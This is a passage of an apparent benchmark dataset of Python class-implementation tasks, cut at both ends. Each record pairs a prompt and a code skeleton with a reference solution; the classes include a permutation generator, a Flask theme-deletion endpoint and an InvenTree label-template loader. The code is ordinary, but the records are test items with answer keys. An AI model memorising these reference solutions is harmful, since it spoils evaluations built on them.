(ans[second_idx], ans[first_idx])\n ans[first_idx + 1:] = ans[first_idx + 1:][::-1]\n return ans\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000463", "length_bytes": 5911, "license_type": "permissive", "methods": [{"docstring": "Version B2 Non-proxy, recursive method, but direct handle elements in nums This only works for when sample is a collection of distinct numbers", "name": "permute", "signature": "def permute(self, nums: List[int]) -> List[List[int]]"}, {"docstring": "Herlper for B1, B2 From Leetcode LC031: next permutation, modified to return a new permute list instead in-place calculate the next permuatation, with integers 0 to N-1 (as idx proxy) this will both modify idx_list and return the updated idx_list", "name": "next_permute", "signature": "def next_permute(self, nums: List[int]) -> List[int]"}], "n_methods": 2, "prompt": "Implement the Python class `Solution_B2` described below.\n\nClass description:\nImplement the Solution_B2 class.\n\nMethod signatures and docstrings:\n- def permute(self, nums: List[int]) -> List[List[int]]: Version B2 Non-proxy, recursive method, but direct handle elements in nums This only works for when sample is a collection of distinct numbers\n- def next_permute(self, nums: List[int]) -> List[int]: Herlper for B1, B2 From Leetcode LC031: next permutation, modified to return a new permute list instead in-place calculate the next permuatation, with integers 0 to N-1 (as idx proxy) this will both modify idx_list and return the updated idx_list", "prompted_full_text": "Implement the Python class `Solution_B2` described below.\n\nClass description:\nImplement the Solution_B2 class.\n\nMethod signatures and docstrings:\n- def permute(self, nums: List[int]) -> List[List[int]]: Version B2 Non-proxy, recursive method, but direct handle elements in nums This only works for when sample is a collection of distinct numbers\n- def next_permute(self, nums: List[int]) -> List[int]: Herlper for B1, B2 From Leetcode LC031: next permutation, modified to return a new permute list instead in-place calculate the next permuatation, with integers 0 to N-1 (as idx proxy) this will both modify idx_list and return the updated idx_list\n\n<|skeleton|>\nclass Solution_B2:\n\n def permute(self, nums: List[int]) -> List[List[int]]:\n \"\"\"Version B2 Non-proxy, recursive method, but direct handle elements in nums This only works for when sample is a collection of distinct numbers\"\"\"\n <|body_0|>\n\n def next_permute(self, nums: List[int]) -> List[int]:\n \"\"\"Herlper for B1, B2 From Leetcode LC031: next permutation, modified to return a new permute list instead in-place calculate the next permuatation, with integers 0 to N-1 (as idx proxy) this will both modify idx_list and return the updated idx_list\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n total_n = factorial(len(nums))\n result = []\n for i in range(total_n):\n result.append(nums[:])\n nums = self.next_permute(nums)\n return result\n<|end_body_0|>\n\n<|body_start_1|>\n first_idx = len(nums) - 2\n second_idx = len(nums) - 1\n while first_idx >= 0 and nums[first_idx] >= nums[first_idx + 1]:\n first_idx -= 1\n if first_idx == -1:\n return nums[:][::-1]\n else:\n ans = nums[:]\n while ans[second_idx] <= ans[first_idx]:\n second_idx -= 1\n ans[first_idx], ans[second_idx] = (ans[second_idx], ans[first_idx])\n ans[first_idx + 1:] = ans[first_idx + 1:][::-1]\n return ans\n<|end_body_1|>\n", "revision_id": "143422321cbc3715ca08f6c3af8f960a55887ced", "skeleton": "<|skeleton|>\nclass Solution_B2:\n\n def permute(self, nums: List[int]) -> List[List[int]]:\n \"\"\"Version B2 Non-proxy, recursive method, but direct handle elements in nums This only works for when sample is a collection of distinct numbers\"\"\"\n <|body_0|>\n\n def next_permute(self, nums: List[int]) -> List[int]:\n \"\"\"Herlper for B1, B2 From Leetcode LC031: next permutation, modified to return a new permute list instead in-place calculate the next permuatation, with integers 0 to N-1 (as idx proxy) this will both modify idx_list and return the updated idx_list\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Solution_B2:\n def permute(self, nums: List[int]) -> List[List[int]]:\n \"\"\"Version B2 Non-proxy, recursive method, but direct handle elements in nums This only works for when sample is a collection of distinct numbers\"\"\"\n total_n = factorial(len(nums))\n result = []\n for i in range(total_n):\n result.append(nums[:])\n nums = self.next_permute(nums)\n return result\n\n def next_permute(self, nums: List[int]) -> List[int]:\n \"\"\"Herlper for B1, B2 From Leetcode LC031: next permutation, modified to return a new permute list instead in-place calculate the next permuatation, with integers 0 to N-1 (as idx proxy) this will both modify idx_list and return the updated idx_list\"\"\"\n first_idx = len(nums) - 2\n second_idx = len(nums) - 1\n while first_idx >= 0 and nums[first_idx] >= nums[first_idx + 1]:\n first_idx -= 1\n if first_idx == -1:\n return nums[:][::-1]\n else:\n ans = nums[:]\n while ans[second_idx] <= ans[first_idx]:\n second_idx -= 1\n ans[first_idx], ans[second_idx] = (ans[second_idx], ans[first_idx])\n ans[first_idx + 1:] = ans[first_idx + 1:][::-1]\n return ans\n", "source": "the_stack_v2_python_sparse", "source_path": "LeetCode/LC046_permutations.py", "source_repo": "jxie0755/Learning_Python", "split": "test", "star_events_count": 0} {"blob_id": "4f0573037474ae51a9f79fb5c4f1659eaea08c13", "bodies": ["self.reqparser = reqparse.RequestParser()\nself.reqparser.add_argument('name', required=False, store_missing=False, type=str, location=['form', 'json'])\nself.reqparser.add_argument('id', required=False, store_missing=False, type=str, location=['form', 'json'])", "if not get_jwt_claims()['admin']:\n return ({'error': 'administration privileges required'}, HTTPStatus.FORBIDDEN)\nargs = self.reqparser.parse_args()\ntheme = Theme.get_by_name(args['name']) if 'name' in args else Theme.get_by_id(args['id'])\nif not theme:\n return ({'error': 'Theme does not exists.', 'id': ' ', 'name': args['name']}, HTTPStatus.BAD_REQUEST)\nsub_themes = SubTheme.get_by_theme_id(theme.id)\nfor sub_theme in sub_themes:\n sub_theme.delete()\n sub_theme.commit()\ntheme.delete()\ntheme.commit()\nreturn ('', HTTPStatus.NO_CONTENT)"], "bodies_text": "<|body_start_0|>\n self.reqparser = reqparse.RequestParser()\n self.reqparser.add_argument('name', required=False, store_missing=False, type=str, location=['form', 'json'])\n self.reqparser.add_argument('id', required=False, store_missing=False, type=str, location=['form', 'json'])\n<|end_body_0|>\n\n<|body_start_1|>\n if not get_jwt_claims()['admin']:\n return ({'error': 'administration privileges required'}, HTTPStatus.FORBIDDEN)\n args = self.reqparser.parse_args()\n theme = Theme.get_by_name(args['name']) if 'name' in args else Theme.get_by_id(args['id'])\n if not theme:\n return ({'error': 'Theme does not exists.', 'id': ' ', 'name': args['name']}, HTTPStatus.BAD_REQUEST)\n sub_themes = SubTheme.get_by_theme_id(theme.id)\n for sub_theme in sub_themes:\n sub_theme.delete()\n sub_theme.commit()\n theme.delete()\n theme.commit()\n return ('', HTTPStatus.NO_CONTENT)\n<|end_body_1|>\n", "class_docstring": "Delete an existing Theme", "class_name": "DeleteTheme", "detected_licenses": ["Apache-2.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass DeleteTheme:\n \"\"\"Delete an existing Theme\"\"\"\n\n def __init__(self) -> None:\n \"\"\"Set required arguments for POST request\"\"\"\n <|body_0|>\n\n def post(self) -> ({str: str}, HTTPStatus):\n \"\"\"Delete an existing Theme. :param name: name of Theme to delete. :param id: id of Theme to delete. :type name: str :type id: str :returns: A no content with a http status code of 204, otherwise a JSON of the error details and the appropriate http status code\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.reqparser = reqparse.RequestParser()\n self.reqparser.add_argument('name', required=False, store_missing=False, type=str, location=['form', 'json'])\n self.reqparser.add_argument('id', required=False, store_missing=False, type=str, location=['form', 'json'])\n<|end_body_0|>\n\n<|body_start_1|>\n if not get_jwt_claims()['admin']:\n return ({'error': 'administration privileges required'}, HTTPStatus.FORBIDDEN)\n args = self.reqparser.parse_args()\n theme = Theme.get_by_name(args['name']) if 'name' in args else Theme.get_by_id(args['id'])\n if not theme:\n return ({'error': 'Theme does not exists.', 'id': ' ', 'name': args['name']}, HTTPStatus.BAD_REQUEST)\n sub_themes = SubTheme.get_by_theme_id(theme.id)\n for sub_theme in sub_themes:\n sub_theme.delete()\n sub_theme.commit()\n theme.delete()\n theme.commit()\n return ('', HTTPStatus.NO_CONTENT)\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000464", "length_bytes": 1917, "license_type": "permissive", "methods": [{"docstring": "Set required arguments for POST request", "name": "__init__", "signature": "def __init__(self) -> None"}, {"docstring": "Delete an existing Theme. :param name: name of Theme to delete. :param id: id of Theme to delete. :type name: str :type id: str :returns: A no content with a http status code of 204, otherwise a JSON of the error details and the appropriate http status code", "name": "post", "signature": "def post(self) -> ({str: str}, HTTPStatus)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_007354", "prompt": "Implement the Python class `DeleteTheme` described below.\n\nClass description:\nDelete an existing Theme\n\nMethod signatures and docstrings:\n- def __init__(self) -> None: Set required arguments for POST request\n- def post(self) -> ({str: str}, HTTPStatus): Delete an existing Theme. :param name: name of Theme to delete. :param id: id of Theme to delete. :type name: str :type id: str :returns: A no content with a http status code of 204, otherwise a JSON of the error details and the appropriate http status code", "prompted_full_text": "Implement the Python class `DeleteTheme` described below.\n\nClass description:\nDelete an existing Theme\n\nMethod signatures and docstrings:\n- def __init__(self) -> None: Set required arguments for POST request\n- def post(self) -> ({str: str}, HTTPStatus): Delete an existing Theme. :param name: name of Theme to delete. :param id: id of Theme to delete. :type name: str :type id: str :returns: A no content with a http status code of 204, otherwise a JSON of the error details and the appropriate http status code\n\n<|skeleton|>\nclass DeleteTheme:\n \"\"\"Delete an existing Theme\"\"\"\n\n def __init__(self) -> None:\n \"\"\"Set required arguments for POST request\"\"\"\n <|body_0|>\n\n def post(self) -> ({str: str}, HTTPStatus):\n \"\"\"Delete an existing Theme. :param name: name of Theme to delete. :param id: id of Theme to delete. :type name: str :type id: str :returns: A no content with a http status code of 204, otherwise a JSON of the error details and the appropriate http status code\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.reqparser = reqparse.RequestParser()\n self.reqparser.add_argument('name', required=False, store_missing=False, type=str, location=['form', 'json'])\n self.reqparser.add_argument('id', required=False, store_missing=False, type=str, location=['form', 'json'])\n<|end_body_0|>\n\n<|body_start_1|>\n if not get_jwt_claims()['admin']:\n return ({'error': 'administration privileges required'}, HTTPStatus.FORBIDDEN)\n args = self.reqparser.parse_args()\n theme = Theme.get_by_name(args['name']) if 'name' in args else Theme.get_by_id(args['id'])\n if not theme:\n return ({'error': 'Theme does not exists.', 'id': ' ', 'name': args['name']}, HTTPStatus.BAD_REQUEST)\n sub_themes = SubTheme.get_by_theme_id(theme.id)\n for sub_theme in sub_themes:\n sub_theme.delete()\n sub_theme.commit()\n theme.delete()\n theme.commit()\n return ('', HTTPStatus.NO_CONTENT)\n<|end_body_1|>\n", "revision_id": "5d123691d1f25d0b85e20e4e8293266bf23c9f8a", "skeleton": "<|skeleton|>\nclass DeleteTheme:\n \"\"\"Delete an existing Theme\"\"\"\n\n def __init__(self) -> None:\n \"\"\"Set required arguments for POST request\"\"\"\n <|body_0|>\n\n def post(self) -> ({str: str}, HTTPStatus):\n \"\"\"Delete an existing Theme. :param name: name of Theme to delete. :param id: id of Theme to delete. :type name: str :type id: str :returns: A no content with a http status code of 204, otherwise a JSON of the error details and the appropriate http status code\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class DeleteTheme:\n \"\"\"Delete an existing Theme\"\"\"\n\n def __init__(self) -> None:\n \"\"\"Set required arguments for POST request\"\"\"\n self.reqparser = reqparse.RequestParser()\n self.reqparser.add_argument('name', required=False, store_missing=False, type=str, location=['form', 'json'])\n self.reqparser.add_argument('id', required=False, store_missing=False, type=str, location=['form', 'json'])\n\n def post(self) -> ({str: str}, HTTPStatus):\n \"\"\"Delete an existing Theme. :param name: name of Theme to delete. :param id: id of Theme to delete. :type name: str :type id: str :returns: A no content with a http status code of 204, otherwise a JSON of the error details and the appropriate http status code\"\"\"\n if not get_jwt_claims()['admin']:\n return ({'error': 'administration privileges required'}, HTTPStatus.FORBIDDEN)\n args = self.reqparser.parse_args()\n theme = Theme.get_by_name(args['name']) if 'name' in args else Theme.get_by_id(args['id'])\n if not theme:\n return ({'error': 'Theme does not exists.', 'id': ' ', 'name': args['name']}, HTTPStatus.BAD_REQUEST)\n sub_themes = SubTheme.get_by_theme_id(theme.id)\n for sub_theme in sub_themes:\n sub_theme.delete()\n sub_theme.commit()\n theme.delete()\n theme.commit()\n return ('', HTTPStatus.NO_CONTENT)\n", "source": "the_stack_v2_python_sparse", "source_path": "Analytics/resources/themes/delete_theme.py", "source_repo": "thanosbnt/SharingCitiesDashboard", "split": "test", "star_events_count": 0} {"blob_id": "1d90ddcf924a46eee270c77349d7b9bdb184343b", "bodies": ["if not isPluginRegistryLoaded() or not isInMainThread():\n return\nif canAppAccessDatabase(allow_test=False):\n try:\n self.create_labels()\n except (AppRegistryNotReady, OperationalError):\n warnings.warn('Database was not ready for creating labels', stacklevel=2)", "import label.models\nassert bool(label.models.StockLocationLabel is not None)\nself.create_labels_category(label.models.StockItemLabel, 'stockitem', [{'file': 'qr.html', 'name': 'QR Code', 'description': 'Simple QR code label', 'width': 24, 'height': 24}])\nself.create_labels_category(label.models.StockLocationLabel, 'stocklocation', [{'file': 'qr.html', 'name': 'QR Code', 'description': 'Simple QR code label', 'width': 24, 'height': 24}, {'file': 'qr_and_text.html', 'name': 'QR and text', 'description': 'Label with QR code and name of location', 'width': 50, 'height': 24}])\nself.create_labels_category(label.models.PartLabel, 'part', [{'file': 'part_label.html', 'name': 'Part Label', 'description': 'Simple part label', 'width': 70, 'height': 24}, {'file': 'part_label_code128.html', 'name': 'Barcode Part Label', 'description': 'Simple part label with Code128 barcode', 'width': 70, 'height': 24}])\nself.create_labels_category(label.models.BuildLineLabel, 'buildline', [{'file': 'buildline_label.html', 'name': 'Build Line Label', 'description': 'Example build line label', 'width': 125, 'height': 48}])", "src_dir = Path(__file__).parent.joinpath('templates', 'label', ref_name)\ndst_dir = settings.MEDIA_ROOT.joinpath('label', 'inventree', ref_name)\nif not dst_dir.exists():\n logger.info(f\"Creating required directory: '{dst_dir}'\")\n dst_dir.mkdir(parents=True, exist_ok=True)\nfor label in labels:\n self.create_template_label(model, src_dir, ref_name, label)", "filename = os.path.join('label', 'inventree', ref_name, label['file'])\nsrc_file = src_dir.joinpath(label['file'])\ndst_file = settings.MEDIA_ROOT.joinpath(filename)\nto_copy = False\nif dst_file.exists():\n if hashFile(dst_file) != hashFile(src_file):\n logger.info(f\"Hash differs for '{filename}'\")\n to_copy = True\nelse:\n logger.info(f\"Label template '{filename}' is not present\")\n to_copy = True\nif to_copy:\n logger.info(f\"Copying label template '{dst_file}'\")\n dst_file.parent.mkdir(parents=True, exist_ok=True)\n shutil.copyfile(src_file, dst_file)\nif model.objects.filter(label=filename).exists():\n return\nlogger.info(f\"Creating entry for {model} '{label['name']}'\")\ntry:\n model.objects.create(name=label['name'], description=label['description'], label=filename, filters='', enabled=True, width=label['width'], height=label['height'])\nexcept Exception:\n logger.warning(f\"Failed to create label '{label['name']}'\")"], "bodies_text": "<|body_start_0|>\n if not isPluginRegistryLoaded() or not isInMainThread():\n return\n if canAppAccessDatabase(allow_test=False):\n try:\n self.create_labels()\n except (AppRegistryNotReady, OperationalError):\n warnings.warn('Database was not ready for creating labels', stacklevel=2)\n<|end_body_0|>\n\n<|body_start_1|>\n import label.models\n assert bool(label.models.StockLocationLabel is not None)\n self.create_labels_category(label.models.StockItemLabel, 'stockitem', [{'file': 'qr.html', 'name': 'QR Code', 'description': 'Simple QR code label', 'width': 24, 'height': 24}])\n self.create_labels_category(label.models.StockLocationLabel, 'stocklocation', [{'file': 'qr.html', 'name': 'QR Code', 'description': 'Simple QR code label', 'width': 24, 'height': 24}, {'file': 'qr_and_text.html', 'name': 'QR and text', 'description': 'Label with QR code and name of location', 'width': 50, 'height': 24}])\n self.create_labels_category(label.models.PartLabel, 'part', [{'file': 'part_label.html', 'name': 'Part Label', 'description': 'Simple part label', 'width': 70, 'height': 24}, {'file': 'part_label_code128.html', 'name': 'Barcode Part Label', 'description': 'Simple part label with Code128 barcode', 'width': 70, 'height': 24}])\n self.create_labels_category(label.models.BuildLineLabel, 'buildline', [{'file': 'buildline_label.html', 'name': 'Build Line Label', 'description': 'Example build line label', 'width': 125, 'height': 48}])\n<|end_body_1|>\n\n<|body_start_2|>\n src_dir = Path(__file__).parent.joinpath('templates', 'label', ref_name)\n dst_dir = settings.MEDIA_ROOT.joinpath('label', 'inventree', ref_name)\n if not dst_dir.exists():\n logger.info(f\"Creating required directory: '{dst_dir}'\")\n dst_dir.mkdir(parents=True, exist_ok=True)\n for label in labels:\n self.create_template_label(model, src_dir, ref_name, label)\n<|end_body_2|>\n\n<|body_start_3|>\n filename = os.path.join('label', 'inventree', ref_name, label['file'])\n src_file = src_dir.joinpath(label['file'])\n dst_file = settings.MEDIA_ROOT.joinpath(filename)\n to_copy = False\n if dst_file.exists():\n if hashFile(dst_file) != hashFile(src_file):\n logger.info(f\"Hash differs for '{filename}'\")\n to_copy = True\n else:\n logger.info(f\"Label template '{filename}' is not present\")\n to_copy = True\n if to_copy:\n logger.info(f\"Copying label template '{dst_file}'\")\n dst_file.parent.mkdir(parents=True, exist_ok=True)\n shutil.copyfile(src_file, dst_file)\n if model.objects.filter(label=filename).exists():\n return\n logger.info(f\"Creating entry for {model} '{label['name']}'\")\n try:\n model.objects.create(name=label['name'], description=label['description'], label=filename, filters='', enabled=True, width=label['width'], height=label['height'])\n except Exception:\n logger.warning(f\"Failed to create label '{label['name']}'\")\n<|end_body_3|>\n", "class_docstring": "App configuration class for the 'label' app", "class_name": "LabelConfig", "detected_licenses": ["MIT", "LicenseRef-scancode-unknown-license-reference"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass LabelConfig:\n \"\"\"App configuration class for the 'label' app\"\"\"\n\n def ready(self):\n \"\"\"This function is called whenever the label app is loaded.\"\"\"\n <|body_0|>\n\n def create_labels(self):\n \"\"\"Create all default templates.\"\"\"\n <|body_1|>\n\n def create_labels_category(self, model, ref_name, labels):\n \"\"\"Create folder and database entries for the default templates, if they do not already exist.\"\"\"\n <|body_2|>\n\n def create_template_label(self, model, src_dir, ref_name, label):\n \"\"\"Ensure a label template is in place.\"\"\"\n <|body_3|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if not isPluginRegistryLoaded() or not isInMainThread():\n return\n if canAppAccessDatabase(allow_test=False):\n try:\n self.create_labels()\n except (AppRegistryNotReady, OperationalError):\n warnings.warn('Database was not ready for creating labels', stacklevel=2)\n<|end_body_0|>\n\n<|body_start_1|>\n import label.models\n assert bool(label.models.StockLocationLabel is not None)\n self.create_labels_category(label.models.StockItemLabel, 'stockitem', [{'file': 'qr.html', 'name': 'QR Code', 'description': 'Simple QR code label', 'width': 24, 'height': 24}])\n self.create_labels_category(label.models.StockLocationLabel, 'stocklocation', [{'file': 'qr.html', 'name': 'QR Code', 'description': 'Simple QR code label', 'width': 24, 'height': 24}, {'file': 'qr_and_text.html', 'name': 'QR and text', 'description': 'Label with QR code and name of location', 'width': 50, 'height': 24}])\n self.create_labels_category(label.models.PartLabel, 'part', [{'file': 'part_label.html', 'name': 'Part Label', 'description': 'Simple part label', 'width': 70, 'height': 24}, {'file': 'part_label_code128.html', 'name': 'Barcode Part Label', 'description': 'Simple part label with Code128 barcode', 'width': 70, 'height': 24}])\n self.create_labels_category(label.models.BuildLineLabel, 'buildline', [{'file': 'buildline_label.html', 'name': 'Build Line Label', 'description': 'Example build line label', 'width': 125, 'height': 48}])\n<|end_body_1|>\n\n<|body_start_2|>\n src_dir = Path(__file__).parent.joinpath('templates', 'label', ref_name)\n dst_dir = settings.MEDIA_ROOT.joinpath('label', 'inventree', ref_name)\n if not dst_dir.exists():\n logger.info(f\"Creating required directory: '{dst_dir}'\")\n dst_dir.mkdir(parents=True, exist_ok=True)\n for label in labels:\n self.create_template_label(model, src_dir, ref_name, label)\n<|end_body_2|>\n\n<|body_start_3|>\n filename = os.path.join('label', 'inventree', ref_name, label['file'])\n src_file = src_dir.joinpath(label['file'])\n dst_file = settings.MEDIA_ROOT.joinpath(filename)\n to_copy = False\n if dst_file.exists():\n if hashFile(dst_file) != hashFile(src_file):\n logger.info(f\"Hash differs for '{filename}'\")\n to_copy = True\n else:\n logger.info(f\"Label template '{filename}' is not present\")\n to_copy = True\n if to_copy:\n logger.info(f\"Copying label template '{dst_file}'\")\n dst_file.parent.mkdir(parents=True, exist_ok=True)\n shutil.copyfile(src_file, dst_file)\n if model.objects.filter(label=filename).exists():\n return\n logger.info(f\"Creating entry for {model} '{label['name']}'\")\n try:\n model.objects.create(name=label['name'], description=label['description'], label=filename, filters='', enabled=True, width=label['width'], height=label['height'])\n except Exception:\n logger.warning(f\"Failed to create label '{label['name']}'\")\n<|end_body_3|>\n", "id": "stack_v2_sparse_classes_10k_test_000465", "length_bytes": 6157, "license_type": "permissive", "methods": [{"docstring": "This function is called whenever the label app is loaded.", "name": "ready", "signature": "def ready(self)"}, {"docstring": "Create all default templates.", "name": "create_labels", "signature": "def create_labels(self)"}, {"docstring": "Create folder and database entries for the default templates, if they do not already exist.", "name": "create_labels_category", "signature": "def create_labels_category(self, model, ref_name, labels)"}, {"docstring": "Ensure a label template is in place.", "name": "create_template_label", "signature": "def create_template_label(self, model, src_dir, ref_name, label)"}], "n_methods": 4, "prompt": "Implement the Python class `LabelConfig` described below.\n\nClass description:\nApp configuration class for the 'label' app\n\nMethod signatures and docstrings:\n- def ready(self): This function is called whenever the label app is loaded.\n- def create_labels(self): Create all default templates.\n- def create_labels_category(self, model, ref_name, labels): Create folder and database entries for the default templates, if they do not already exist.\n- def create_template_label(self, model, src_dir, ref_name, label): Ensure a label template is in place.", "prompted_full_text": "Implement the Python class `LabelConfig` described below.\n\nClass description:\nApp configuration class for the 'label' app\n\nMethod signatures and docstrings:\n- def ready(self): This function is called whenever the label app is loaded.\n- def create_labels(self): Create all default templates.\n- def create_labels_category(self, model, ref_name, labels): Create folder and database entries for the default templates, if they do not already exist.\n- def create_template_label(self, model, src_dir, ref_name, label): Ensure a label template is in place.\n\n<|skeleton|>\nclass LabelConfig:\n \"\"\"App configuration class for the 'label' app\"\"\"\n\n def ready(self):\n \"\"\"This function is called whenever the label app is loaded.\"\"\"\n <|body_0|>\n\n def create_labels(self):\n \"\"\"Create all default templates.\"\"\"\n <|body_1|>\n\n def create_labels_category(self, model, ref_name, labels):\n \"\"\"Create folder and database entries for the default templates, if they do not already exist.\"\"\"\n <|body_2|>\n\n def create_template_label(self, model, src_dir, ref_name, label):\n \"\"\"Ensure a label template is in place.\"\"\"\n <|body_3|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if not isPluginRegistryLoaded() or not isInMainThread():\n return\n if canAppAccessDatabase(allow_test=False):\n try:\n self.create_labels()\n except (AppRegistryNotReady, OperationalError):\n warnings.warn('Database was not ready for creating labels', stacklevel=2)\n<|end_body_0|>\n\n<|body_start_1|>\n import label.models\n assert bool(label.models.StockLocationLabel is not None)\n self.create_labels_category(label.models.StockItemLabel, 'stockitem', [{'file': 'qr.html', 'name': 'QR Code', 'description': 'Simple QR code label', 'width': 24, 'height': 24}])\n self.create_labels_category(label.models.StockLocationLabel, 'stocklocation', [{'file': 'qr.html', 'name': 'QR Code', 'description': 'Simple QR code label', 'width': 24, 'height': 24}, {'file': 'qr_and_text.html', 'name': 'QR and text', 'description': 'Label with QR code and name of location', 'width': 50, 'height': 24}])\n self.create_labels_category(label.models.PartLabel, 'part', [{'file': 'part_label.html', 'name': 'Part Label', 'description': 'Simple part label', 'width': 70, 'height': 24}, {'file': 'part_label_code128.html', 'name': 'Barcode Part Label', 'description': 'Simple part label with Code128 barcode', 'width': 70, 'height': 24}])\n self.create_labels_category(label.models.BuildLineLabel, 'buildline', [{'file': 'buildline_label.html', 'name': 'Build Line Label', 'description': 'Example build line label', 'width': 125, 'height': 48}])\n<|end_body_1|>\n\n<|body_start_2|>\n src_dir = Path(__file__).parent.joinpath('templates', 'label', ref_name)\n dst_dir = settings.MEDIA_ROOT.joinpath('label', 'inventree', ref_name)\n if not dst_dir.exists():\n logger.info(f\"Creating required directory: '{dst_dir}'\")\n dst_dir.mkdir(parents=True, exist_ok=True)\n for label in labels:\n self.create_template_label(model, src_dir, ref_name, label)\n<|end_body_2|>\n\n<|body_start_3|>\n filename = os.path.join('label', 'inventree', ref_name, label['file'])\n src_file = src_dir.joinpath(label['file'])\n dst_file = settings.MEDIA_ROOT.joinpath(filename)\n to_copy = False\n if dst_file.exists():\n if hashFile(dst_file) != hashFile(src_file):\n logger.info(f\"Hash differs for '{filename}'\")\n to_copy = True\n else:\n logger.info(f\"Label template '{filename}' is not present\")\n to_copy = True\n if to_copy:\n logger.info(f\"Copying label template '{dst_file}'\")\n dst_file.parent.mkdir(parents=True, exist_ok=True)\n shutil.copyfile(src_file, dst_file)\n if model.objects.filter(label=filename).exists():\n return\n logger.info(f\"Creating entry for {model} '{label['name']}'\")\n try:\n model.objects.create(name=label['name'], description=label['description'], label=filename, filters='', enabled=True, width=label['width'], height=label['height'])\n except Exception:\n logger.warning(f\"Failed to create label '{label['name']}'\")\n<|end_body_3|>\n", "revision_id": "e88a8e99a5f0b201c67a95cba097c729f090d5e2", "skeleton": "<|skeleton|>\nclass LabelConfig:\n \"\"\"App configuration class for the 'label' app\"\"\"\n\n def ready(self):\n \"\"\"This function is called whenever the label app is loaded.\"\"\"\n <|body_0|>\n\n def create_labels(self):\n \"\"\"Create all default templates.\"\"\"\n <|body_1|>\n\n def create_labels_category(self, model, ref_name, labels):\n \"\"\"Create folder and database entries for the default templates, if they do not already exist.\"\"\"\n <|body_2|>\n\n def create_template_label(self, model, src_dir, ref_name, label):\n \"\"\"Ensure a label template is in place.\"\"\"\n <|body_3|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class LabelConfig:\n \"\"\"App configuration class for the 'label' app\"\"\"\n\n def ready(self):\n \"\"\"This function is called whenever the label app is loaded.\"\"\"\n if not isPluginRegistryLoaded() or not isInMainThread():\n return\n if canAppAccessDatabase(allow_test=False):\n try:\n self.create_labels()\n except (AppRegistryNotReady, OperationalError):\n warnings.warn('Database was not ready for creating labels', stacklevel=2)\n\n def create_labels(self):\n \"\"\"Create all default templates.\"\"\"\n import label.models\n assert bool(label.models.StockLocationLabel is not None)\n self.create_labels_category(label.models.StockItemLabel, 'stockitem', [{'file': 'qr.html', 'name': 'QR Code', 'description': 'Simple QR code label', 'width': 24, 'height': 24}])\n self.create_labels_category(label.models.StockLocationLabel, 'stocklocation', [{'file': 'qr.html', 'name': 'QR Code', 'description': 'Simple QR code label', 'width': 24, 'height': 24}, {'file': 'qr_and_text.html', 'name': 'QR and text', 'description': 'Label with QR code and name of location', 'width': 50, 'height': 24}])\n self.create_labels_category(label.models.PartLabel, 'part', [{'file': 'part_label.html', 'name': 'Part Label', 'description': 'Simple part label', 'width': 70, 'height': 24}, {'file': 'part_label_code128.html', 'name': 'Barcode Part Label', 'description': 'Simple part label with Code128 barcode', 'width': 70, 'height': 24}])\n self.create_labels_category(label.models.BuildLineLabel, 'buildline', [{'file': 'buildline_label.html', 'name': 'Build Line Label', 'description': 'Example build line label', 'width': 125, 'height': 48}])\n\n def create_labels_category(self, model, ref_name, labels):\n \"\"\"Create folder and database entries for the default templates, if they do not already exist.\"\"\"\n src_dir = Path(__file__).parent.joinpath('templates', 'label', ref_name)\n dst_dir = settings.MEDIA_ROOT.joinpath('label', 'inventree', ref_name)\n if not dst_dir.exists():\n logger.info(f\"Creating required directory: '{dst_dir}'\")\n dst_dir.mkdir(parents=True, exist_ok=True)\n for label in labels:\n self.create_template_label(model, src_dir, ref_name, label)\n\n def create_template_label(self, model, src_dir, ref_name, label):\n \"\"\"Ensure a label template is in place.\"\"\"\n filename = os.path.join('label', 'inventree', ref_name, label['file'])\n src_file = src_dir.joinpath(label['file'])\n dst_file = settings.MEDIA_ROOT.joinpath(filename)\n to_copy = False\n if dst_file.exists():\n if hashFile(dst_file) != hashFile(src_file):\n logger.info(f\"Hash differs for '{filename}'\")\n to_copy = True\n else:\n logger.info(f\"Label template '{filename}' is not present\")\n to_copy = True\n if to_copy:\n logger.info(f\"Copying label template '{dst_file}'\")\n dst_file.parent.mkdir(parents=True, exist_ok=True)\n shutil.copyfile(src_file, dst_file)\n if model.objects.filter(label=filename).exists():\n return\n logger.info(f\"Creating entry for {model} '{label['name']}'\")\n try:\n model.objects.create(name=label['name'], description=label['description'], label=filename, filters='', enabled=True, width=label['width'], height=label['height'])\n except Exception:\n logger.warning(f\"Failed to create label '{label['name']}'\")\n", "source": "the_stack_v2_python_sparse", "source_path": "InvenTree/label/apps.py", "source_repo": "inventree/InvenTree", "split": "test", "star_events_count": 3077} {"blob_id": "a396e0d0d0832825a16cf6cf5995af63faa77d9a", "bodies": ["self = object.__new__(cls)\nself.variables = variables\nself.parser_failure_info = parser_failure_info\nself.file_path = file_path\nreturn self", "for key, value in self.variables.items():\n if value is None:\n value = ''\n environmental_variables.setdefault(key, value)\n if environmental_variables_binary is not None:\n environmental_variables_binary.setdefault(key.encode(), value.encode())\nreturn self", "parser_failure_info = self.parser_failure_info\nif parser_failure_info is not None:\n raise SyntaxError(parser_failure_info.get_error_message(), (self.file_path, parser_failure_info.line_index + 1, parser_failure_info.index + 1, parser_failure_info.line))\nreturn self", "repr_parts = ['<', self.__class__.__name__]\nrepr_parts.append(' variables: ')\nrepr_parts.append(repr(len(self.variables)))\nparser_failure_info = self.parser_failure_info\nif parser_failure_info is not None:\n repr_parts.append(', parser_failure_info = ')\n 